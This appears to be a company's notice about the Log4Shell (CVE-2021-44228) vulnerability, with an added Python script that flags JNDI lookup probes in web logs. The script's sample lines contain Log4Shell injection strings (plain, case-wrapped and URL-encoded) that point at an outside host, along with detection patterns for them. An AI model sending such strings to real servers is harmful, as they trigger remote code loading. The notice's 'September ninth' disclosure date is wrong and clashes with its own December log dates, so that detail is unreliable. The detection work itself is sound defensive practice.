In the past few days there has been a lot of talk about a new, potentially very serious security vulnerability called Log4Shell. The vulnerability was disclosed on September ninth, and since then we have received many questions from customers and partners.
Background
The bug enables an attacker to execute arbitrary code through the logging library Log4j, which is used in millions of software packages around the world. The vulnerability has been assigned the identifier CVE-2021-44228.
What we are doing
When we learned of the vulnerability we immediately took the following actions:
- We used dependency scanning to look for the affected software package across our product portfolio. The scan looked at both direct and transitive dependencies.
- We evaluated third-party tools and services for impact.
- We added rules to our IDS (intrusion detection system) and to our system logging to detect attempts to scan for, or exploit, the vulnerability.
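As an added illustration of the kind of log-based detection rule described in the last step (not code from the original notice), the checker below flags the JNDI lookup string behind CVE-2021-44228 in web server log lines, after undoing URL encoding and the ${lower:}/${upper:} wrappers that are sometimes used to hide it. The log lines, IP addresses and function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the original notice): a benign request,
# a plain JNDI lookup in the User-Agent, a case-wrapped variant, and one that is
# URL-encoded in the query string.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${upper:rmi}://203.0.113.9:1099/x}"',
    '198.51.100.8 - - [10/Dec/2021:10:01:11 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fx%7D HTTP/1.1" 404 "curl/7.68.0"',
]

# Lookup wrappers such as ${lower:j} or ${upper:x} that evaluate to their inner text.
CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# A JNDI lookup using one of the schemes Log4j can resolve through JNDI.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?):", re.IGNORECASE)


def normalize(line: str) -> str:
    """Undo the layers that hide the lookup from a naive substring match."""
    text = unquote(line)          # %24%7B -> ${
    previous = None
    while previous != text:       # peel nested wrappers until the text is stable
        previous = text
        text = CASE_WRAPPER.sub(lambda m: m.group(1), text)
    return text


def find_jndi_probes(lines):
    """Return (line_number, scheme, normalized_line) for each line containing a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        text = normalize(line)
        match = JNDI_LOOKUP.search(text)
        if match:
            hits.append((number, match.group(1).lower(), text))
    return hits


if __name__ == "__main__":
    for number, scheme, text in find_jndi_probes(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup via {scheme} -> {text}")
```

A real rule set would also cover other evasions and feed matches into the IDS alerting pipeline; this example only shows the normalize-then-match structure.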
Results
We found no direct or transitive dependencies on the affected package in our own codebases. An internal HR tool was patched; this system did not handle customer data.
What now
We will continue to monitor the situation as it develops.